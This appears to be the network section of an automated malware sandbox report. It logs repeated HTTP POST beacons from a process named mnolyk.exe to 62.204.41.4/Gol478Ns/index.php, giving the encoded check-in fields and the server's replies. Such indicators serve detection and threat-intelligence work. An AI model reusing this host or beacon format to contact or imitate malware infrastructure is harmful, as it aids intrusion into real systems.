                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:49.780553102 CET | 323 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:49.842638969 CET | 323 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    123 | 192.168.2.3 | 49825 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:50.017874002 CET | 324 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:50.084322929 CET | 324 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    124 | 192.168.2.3 | 49826 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:50.292454958 CET | 325 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:50.359834909 CET | 325 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    125 | 192.168.2.3 | 49827 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:50.529166937 CET | 326 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:50.592324972 CET | 326 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    126 | 192.168.2.3 | 49828 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:50.782978058 CET | 327 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:50.848160982 CET | 327 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    127 | 192.168.2.3 | 49829 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:51.027291059 CET | 328 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:51.091653109 CET | 328 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    128 | 192.168.2.3 | 49830 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:51.265355110 CET | 329 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:51.328028917 CET | 329 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    129 | 192.168.2.3 | 49831 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:51.495547056 CET | 330 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:51.557868004 CET | 330 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    13 | 192.168.2.3 | 49714 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:13.211258888 CET | 213 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:13.275711060 CET | 214 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    130 | 192.168.2.3 | 49832 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:51.751305103 CET | 331 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:51.814352036 CET | 331 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    131 | 192.168.2.3 | 49833 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:51.983787060 CET | 332 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:52.050180912 CET | 332 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    132 | 192.168.2.3 | 49834 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:52.577364922 CET | 333 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:52.640379906 CET | 333 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    133 | 192.168.2.3 | 49835 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:52.859570980 CET | 334 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:52.922553062 CET | 334 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    134 | 192.168.2.3 | 49836 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:53.163923025 CET | 335 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:53.229603052 CET | 335 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    135 | 192.168.2.3 | 49837 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:54.069031000 CET | 336 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:54.132919073 CET | 336 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    136 | 192.168.2.3 | 49838 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:54.373775959 CET | 337 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:54.438036919 CET | 337 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    137 | 192.168.2.3 | 49839 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:55.963336945 CET | 338 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:56.031137943 CET | 338 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    138 | 192.168.2.3 | 49840 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:56.252732038 CET | 339 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:56.321096897 CET | 339 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    139 | 192.168.2.3 | 49841 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:56.501983881 CET | 340 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:56.567166090 CET | 340 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
